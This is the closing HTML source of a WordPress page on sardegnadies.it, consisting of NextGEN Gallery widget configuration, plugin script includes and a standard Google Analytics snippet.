galleries.gallery_908c33acbcafa33084545ed99a595c86 = {"id":null,"source":"random_images","container_ids":["2"],"gallery_ids":[],"album_ids":[],"tag_ids":[],"display_type":"photocrati-nextgen_basic_thumbnails","exclusions":[],"order_by":"filename","order_direction":"ASC","image_ids":[],"entity_ids":[],"tagcloud":false,"returns":"included","slug":"widget-ngg-images-2","sortorder":[],"display_settings":{"use_lightbox_effect":true,"images_per_page":4,"number_of_columns":0,"thumbnail_width":120,"thumbnail_height":90,"show_all_in_lightbox":false,"ajax_pagination":0,"use_imagebrowser_effect":false,"template":"\/htdocs\/public\/www\/wp-content\/plugins\/nextgen-gallery\/products\/photocrati_nextgen\/modules\/widget\/templates\/display_gallery.php","display_no_images_error":1,"disable_pagination":true,"show_slideshow_link":false,"slideshow_link_text":"[Show slideshow]","override_thumbnail_settings":0,"thumbnail_quality":"100","thumbnail_crop":1,"thumbnail_watermark":0,"ngg_triggers_display":"never","_errors":[],"maximum_entity_count":4,"image_type":"thumb","show_thumbnail_link":false,"image_width":100,"image_height":75,"widget_setting_title":"Gallery","widget_setting_before_widget":"<div id=\"ngg-images-2\" class=\"widget ngg_images\"><div class=\"hslice\" id=\"ngg-webslice\">","widget_setting_before_title":"<h4>","widget_setting_after_widget":"<\/div><\/div>","widget_setting_after_title":"<\/h4>","widget_setting_width":100,"widget_setting_height":75,"widget_setting_show_setting":"thumbnail","widget_setting_widget_id":"ngg-images-2"},"excluded_container_ids":[],"maximum_entity_count":4,"__defaults_set":true,"variation":2,"_errors":[],"ID":"908c33acbcafa33084545ed99a595c86"};
galleries.gallery_908c33acbcafa33084545ed99a595c86.wordpress_page_root = "http:\/\/www.sardegnadies.it\/indipendentismo-problema-europeo\/";
var nextgen_lightbox_settings = {"static_path":"http:\/\/www.sardegnadies.it\/wp-content\/plugins\/nextgen-gallery\/products\/photocrati_nextgen\/modules\/lightbox\/static","context":"nextgen_images"};
galleries.gallery_f767ad73035a6ad9189ffcd575e3c613 = {"id":null,"source":"galleries","container_ids":["644"],"gallery_ids":[],"album_ids":[],"tag_ids":[],"display_type":"photocrati-nextgen_basic_slideshow","exclusions":[],"order_by":"filename","order_direction":"ASC","image_ids":[],"entity_ids":[],"tagcloud":false,"returns":"included","slug":"widget-slideshow-2","sortorder":[],"display_settings":{"use_lightbox_effect":true,"gallery_width":160,"gallery_height":120,"thumbnail_width":120,"thumbnail_height":90,"cycle_interval":10,"cycle_effect":"fade","effect_code":"class=\"ngg-fancybox\" rel=\"%GALLERY_NAME%\"","show_thumbnail_link":false,"thumbnail_link_text":"[Show thumbnails]","template":"","ngg_triggers_display":"never","_errors":[],"entity_types":["image"],"show_slideshow_link":false,"use_imagebrowser_effect":false},"excluded_container_ids":[],"maximum_entity_count":500,"__defaults_set":true,"_errors":[],"ID":"f767ad73035a6ad9189ffcd575e3c613"};
galleries.gallery_f767ad73035a6ad9189ffcd575e3c613.wordpress_page_root = "http:\/\/www.sardegnadies.it\/indipendentismo-problema-europeo\/";
var nextgen_lightbox_settings = {"static_path":"http:\/\/www.sardegnadies.it\/wp-content\/plugins\/nextgen-gallery\/products\/photocrati_nextgen\/modules\/lightbox\/static","context":"nextgen_images"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/common.min.js?ver=3.0.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_gallery/static/thumbnails/nextgen_basic_thumbnails.min.js?ver=3.0.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.min.js?ver=3.0.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/fancybox/jquery.easing-1.3.pack.js?ver=3.0.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/fancybox/jquery.fancybox-1.3.4.pack.js?ver=3.0.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/fancybox/nextgen_fancybox_init.min.js?ver=3.0.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_gallery/static/slideshow/jquery.cycle.all.min.js?ver=3.0.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_gallery/static/slideshow/jquery.waitforimages.min.js?ver=3.0.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_gallery/static/slideshow/nextgen_basic_slideshow.min.js?ver=3.0.1'></script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-49161744-1', 'sardegnadies.it');
ga('require', 'displayfeatures');
  ga('send', 'pageview');

</script><div id="fb-root"></div></body>
</html>